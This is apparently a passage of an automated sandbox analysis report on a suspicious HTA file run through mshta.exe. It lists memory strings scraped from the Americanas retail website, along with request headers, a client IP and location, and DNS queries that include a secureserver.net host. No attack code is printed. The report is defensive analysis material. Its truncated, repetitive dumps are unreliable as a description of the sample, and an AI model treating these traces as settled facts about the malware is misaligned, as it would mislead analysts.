Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png","productNotifyUrl":"https://s-apps.americanas.com.br/responsys/cr.php","appUrlScheme":"acom:/","hjid":"369648","gtm":"GTM-PDFX6WC","ga":"UA-97626372-1","twitter":"o48n0","facebook":"1391826854417470","footer":{"accessibilityToken":"8e1eea2617027d529bd5c2dfd5f23b0d","hotsite":"/hotsite/acessibilidade"},"googlermkt":"1033431979","rtbhouse":"pr_c3lsQvZAJR5rx4hJbram","email":"atendimento.acom@americanas.com","socialMedia":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"sellerName":"americanas.com","pxId":"PXZD817siC","tiktok":{"enabled":true,"pixelId":"C54F35G00UN7QUNFBBB0"},"criteo":{"id":8416},"socialMiner":{"id":"48fa0f87-bd6b-4625-947c-f50f42facd1f"},"side":"server","endpoints":{"graphql":"http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql","mars":"https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements","graphqlv2":"http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql","customer":"https://customer-v6-americanas.b2w.io/customer/","region":"https://b2w-region-v1.b2w.io/b2w-region","turbo":"http://turbo-v2-americanas-npf.metaplane.cloud/slug/url","qna":"http://qna-v3-b2w.b2w.io","filler":"https://sacola.americanas.com.br/filler-v2","newtail":"https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3","wishlist":"https://wishlist-v1-americanas.b2w.io"},"version":"3.0.630"},"headers":{"host":"catalogo-v3-americanas-npf.metaplane.cloud","sec-ch-ua":"\"Google Chrome\";v=\"131\", \"Chromium\";v=\"131\", \"Not_A Brand\";v=\"24\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"Windows\"","upgrade-insecure-requests":"1","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","accept-language":"pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7","priority":"u=0, i","true-client-port":", ","x-akamai-edgescape":"georegion=33,country_code=BR,region_code=SC,city=FLORIANOPOLIS,lat=-27.58,long=-48.57,timezone=GMT-3,continent=SA,throughput=vhigh,bw=5000,asnum=53222,location_id=0","x-client-ip":"138.59.131.85","pragma":"no-cache","x-edgeconnect-session-id":"a6f3645f675721f9185c991f","x-bm-ha":"1~26~675721f9~3e327569b9e283126773a25f075f7fe0e0b98ce0b259d11620c9ee8cf1e71ee5","cdn-city":"FLORIANOPOLIS","cdn-region":"SC","cdn-country":"BR","cdn-long":"-48.57","cdn-lat":"-27.58","channel":"ACOM","catalogtestab":"null","searchtestab":"old","device-type":"desktop","x-akamai-config-log-detail":"true","accept-encoding":"gzip","akamai-origin-hop":"2","cache-control":"no-cache, max-age=0","x-cloud-trac
Source: mshta.exe, 00000001.00000003.12512233499.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550466374.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C10A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas equals www.facebook.com (Facebook)
Source: mshta.exe, 00000001.00000003.12512134953.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/americanas+ equals www.facebook.com (Facebook)
Source: mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Cana equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12507926809.000000000BEC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579440591.000000000BEC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/CanalAmericanas equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/CanalAmericanasX equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12507926809.000000000BEC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579440591.000000000BEC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/CanalAmericanas{ equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, gtm[1].js.1.drString found in binary or memory: return b}VD.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.facebook.com (Facebook)
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.twitter.com (Twitter)
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tica de Privacidade</a>.</p><button class="lgpd-message-box__Button-sc-v4fjru-3 kTBvxF">continuar e fechar</button></div></header><main class="src__Container-sc-m79eh9-0 ihEuUG"><script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}</script><div data-position="maintop1" class="position__DivPosition-sc-gutplb-0 jjvunh"><div class="grid__StyledGrid-sc-1man2hx-0 imOqUG src__StyledGrid-sc-1icsx5y-0 drnfxw"><div class="col__StyledCol-sc-1snw5v3-0 fakODz theme-grid-col src__StyledCol-sc-1icsx5y-1 ivOpzk"><a target="_self" aria-current="page" href="https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_ge"><div class="src__Wrapper-sc-1nfceik-0 bnGOIG spacey-image"><div class="src__Wrapper-sc-xr9q25-1 eWpAQi lazy-picture"><picture class="src__Picture-sc-xr9q25-2 jAziSf"><source srcSet="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" media="(min-width: 1024px)"/><img src="https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.webp" alt="s equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12535020739.0000000009A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tps://www.youtube.com/user/CanalAmericanas equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: mshta.exe, 00000001.00000003.11774818704.0000000006A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557060559.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579765668.000000000BFFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.comZW equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12555406957.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557060559.000000000BFFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579765668.000000000BFFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.comfW equals www.youtube.com (Youtube)
Source: mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.facebook.com (Facebook)
Source: mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.twitter.com (Twitter)
Source: mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"} equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: srtb.msn.com
Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: www.americanas.com.br
Source: global trafficDNS traffic detected: DNS query: images-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: statics-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: logs-referer.s3-sa-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: s3-sa-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: 102.57.205.92.host.secureserver.net
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: http://amedigital.com/
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: http://www.americanas.com.br/cartao-americanas
Source: mshta.exe, 00000001.00000003.11774937152.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, gtm[1].js.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578601158.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512492941.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://americanasadvertising.com/?utm_source=site_marcas_americanas&utm_medium=banner&utm_campaign=
